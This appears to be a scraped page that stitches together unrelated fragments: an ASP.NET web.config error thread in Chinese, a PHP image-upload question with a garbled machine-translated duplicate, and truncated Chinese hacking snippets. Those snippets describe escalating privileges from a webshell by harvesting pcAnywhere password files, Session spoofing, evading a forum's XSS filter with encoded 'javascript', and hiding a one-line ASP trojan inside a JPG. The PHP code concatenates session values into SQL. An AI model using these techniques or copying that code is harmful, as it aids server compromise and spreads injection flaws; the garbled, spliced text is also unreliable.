设置section第17行<section name="scriptResourceHandler" type="System.

说明: 在处理向该请求提供服务所需的配置文件时出错。请检查下面的特定错误详细信息并适当地修改配置文件。
分析器错误信息: 无法识别的属性“type”。
刚才那位达人呢,再帮帮忙啊。工作作需要啊,没有办法只能再学.net了,还得先学c#.现在还没有什么头绪呢配置错误 说明: 在处理向该请求提供服务所需的配置文件时出错。请检查下面的特定错误详细信息并适当地修改配置文件。 分析器错误消息: 在应用程序级别之外使用注册为 allowDefinition='MachineToApplication' 的节是错误的。如果在 IIS 中没有将虚拟目录配置为应用程序,则可能导致此错误。源错误: 行 29:
安全身份验证模式。 行 30:
&authentication mode=&Windows&/&行 32:
&!--行 33:
如果在执行请求的过程中出现未处理的错误,源文件: E:\web\firstwebdemo\firstwebdemo\web.config
行: 31 --------------------------------------------------------------------------------版本信息: Microsoft .NET Framework 版本:2.0.; ASP.NET 版本:2.0.我现在的问题是在IIS的中,找不到在那改啊?
楼主 不是 Java努力学习 吗?呵呵。。怎么改行.net来了?你的问题可能是因为asp.net版本的问题。。建议装一下最新的.net framework。。然后再在iis中将asp.net的版本选择 2.0(你现在是1.1)
你使用的 ajax 扩展与你的主 .net 版本不兼容你使用的是 3.5 .net 主版本也应该使用 3.5在 IIS 中找到网站的目录,点击右键-&属性在打开的对话框中,点击&创建&按钮,确定就应该OK了
引用1楼 @ 发表的:
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oneyear in Tibet!挺不错的
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82人参加团购229.00元&399.00元EDIT :: I found out that i am having a permission error. For whatever reason i dont have "permission" to grab the image from the images folder ... *
a few days ago i asked this question about uploading images and was very satisfied with the anwser. I integrated it into my site and it works no problem.
The problem i am having now is i cannot retrieve the images in any way shape or form. I have tried opening them and setting them to read, with fopen($image, r). I tried even more complicated things like loading the image back into a database ... then it hit me that the anwser is simple.
I CAN see the image in my images folder, so
should work no problem. But it doesnt =(
Here is the PHP script one more time,
if (isset($_FILES['fupload'] ))
$max_size = mysql_real_escape_string(strip_tags($_POST['MAX_FILE_SIZE']));
$file = $_FILES['fupload']['name'];
if(isset($max_size) && !empty($max_size) && !empty($file)) {
$file_type = $_FILES['fupload']['type'];
$tmp = $_FILES['fupload']['tmp_name'];
$file_size = $_FILES['fupload']['size'];
$allowed_type = array('image/png', 'image/jpg', 'image/jpeg', 'image/gif');
if(in_array($file_type, $allowed_type)) {
if($file_size & $max_size) {
$path ='images/'.$
$move = move_uploaded_file($tmp, $path);
$sql = "UPDATE info.profile SET Profile_pic='".$move."', pic_name='".$file."' WHERE Nick='".$_SESSION['Nick']."'";
mysql_query($sql) or die ("Error: " .mysql_error());
$_SESSION['pic'] = $
echo "image added successfully :) :) :) ";
I left out all the else statements, since they are not relevent. The folowing is an example of where the image should be displayed.
&td rowspan=2 align=center width=100px& &img src="&?php $_SESSION['pic']; ?&"
alt="Here would be the picture, if it was working !!"& &/td&
The alt is a small teaser of course, but i have tried everything and with the current script i managed to get the alt text to display. Sometimes a "bad image" icon displayes (like when you open images in an email before allowing images to be displayed)
When i echo the path it shows the "right" path, just like i would enter when manualy giving it in. The reason i store the path in DB and in a session is because the image is a profile image and should only be displayed for THAT user ... wouldnt want other users having other images as their profile pic. =)
解决方案 The path should be relative to the current directory. Have u checked it ?
Try the answer given in comment by Rohit.
&img src='&?php echo $_SESSION['pic']; ?&' /&
本文地址: &
编辑::我发现我有一个权限错误。无论出于何种原因,我没有“许可”从图像文件夹中获取图像...... * b
我现在遇到的问题是我无法以任何形式或形式检索图像。我试图打开它们,并设置它们阅读,与fopen($ image,r)。我尝试了更复杂的东西,比如将图像加载回数据库......然后它让我感觉到anwser很简单。
我可以在我的图片文件夹中看到图片,所以应该没问题。但它不= =($ / b>
if(isset($ _ FILES ['fupload'])) {
$ max_size = mysql_real_escape_string(strip_tags($ _ POST [ 'MAX_FILE_SIZE']));
$ file = $ _FILES ['fupload'] ['name'];
if(isset($ max_size)&&!empty($ ($ file)){ $ file_type = $ _FILES ['fupload'] ['type'];
$ tmp = $ _FILES ['fupload'] ['' tmp_name'];
$ file_size = $ _FILES ['fupload'] ['size'];
$ allowed_type = array('image / png','image / jpg',' ($ file_type,$ allowed_type)){ if($ file_size& $ max_size){ $ path ='images /'.$
$ move = move_uploaded_file($ tmp,$ path);
$ sql =“UPDATE info.profile SET Profile_pic ='”。$移动。“',pic_name ='”。$ file。“'WHERE Nick ='”。$ _ SESSION ['Nick']。“'”;
mysql_query($ sql)或者死(“Error:”.mysql_error());
$ _SESSION ['pic'] = $
echo“图片添加成功:) :) :)”; }
& td rowspan = 2 align = center width = 100px& & img src =“&?php $ _SESSION ['pic'];?&”
alt =“这是图片,如果它工作正常!!”& < / TD>
解决方案 相对于当前目录,路径应该是。你有没有检查过它?
试试在 Rohit 评论中给出的答案。
& img src ='&?php echo $ _SESSION ['pic']; &'/&
本文地址: &
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WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆 c:\Program
不知不觉&LM团伙&看黑防已有两个春秋了,期期不落.潜心修炼了这么久,也能开始耍上一两招了.看了黑防第二期的&DreamWeaver引发网络危机&一文,&LM团伙&内心有说不出的激动,心想网上有40%的网页都有这样的漏洞,那岂不是又能收获N多肉鸡了.可是仔细研究发现,这个文章的方法存在一些问题,并不像想象中的那样容易发挥.下面就与大家一起讨论一下Session. 既然是谈Session欺骗,那么就先来看一下Session到底是什么,它是怎么工作的.在AS
各种漏洞的利用和一些搜索参数 说到漏洞,首先应该提到的就是动网的上传漏洞了. &洞网&漏洞拉开了上传漏洞文件的序幕,其他系统的上 传漏洞接踵而来! asp动网论坛漏洞分析 1.这个漏洞不算太严重,用过动网论坛的人都知道,发帖时直接写javascript会被过滤拆分,写http会自动加上链接,漏洞就在此,在这两个地方变通一下,把两个单词的某个字母换成编码形式,然后系统再对应地解码回字母,就达到了避免被过滤的目的.例子说明一下,在发帖时写入[img]javas&#x63ript:w
WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆 c:\Program
1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为&!--#i nclude file=&ating.jpg&--& 找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为 了运行成功,还要搜索&%和%&,将其变为00,(不要替换自己asp的),再把jpg文件开头加入 &SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT&eval(Requ
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Application of several items this evening saw the blog a deep impression on how both could not sleep at night. Ever since, the following blog was born ^ - ^. I am not saying that I think it was familiar with Spring.NET Framework and other frameworks
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JSP (Java Server Page) and ASP (Active Server Page) both of which are commonly used in dynamic web page technology, but also can all be embedded in HTML in the procedure, but they are essentially different, mainly from the following aspects of its co
1. The difference is that through server control, to achieve the separation of the code before and after too. Dynamic Language 2.html and the difference is that the page request, the server is the implementation of the language background of
button of a property, when UseSubmitBehavior = true, use your browser's submit mechanism, otherwise use the postback mechanism When UseSubmitBehavior property is false, control developers can use the method to return Button GetPostBackEventRe
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The first step: create a new access database: db1 Document in the database built inside the table has two fields CreateDate and Title Step Two: Create a new. Aspx file, the code below using S using System.C using System.ComponentMode
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Error 1 &ASP.default_aspx.GetTypeHashCode ()&: no suitable method found to override Error 2 &ASP.default_aspx.ProcessRequest (System.Web.HttpContext)&: no suitable method found to override Error 3 &ASP.default_aspx& will not
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You can FCKEDITOR placed to any folder, by default, put it in to the FCKEDITOR folder is the most simple way. If you put the folder to use other names, change the configuration file in the folder editor BasePath parameters as follows: oFckeditor.Base
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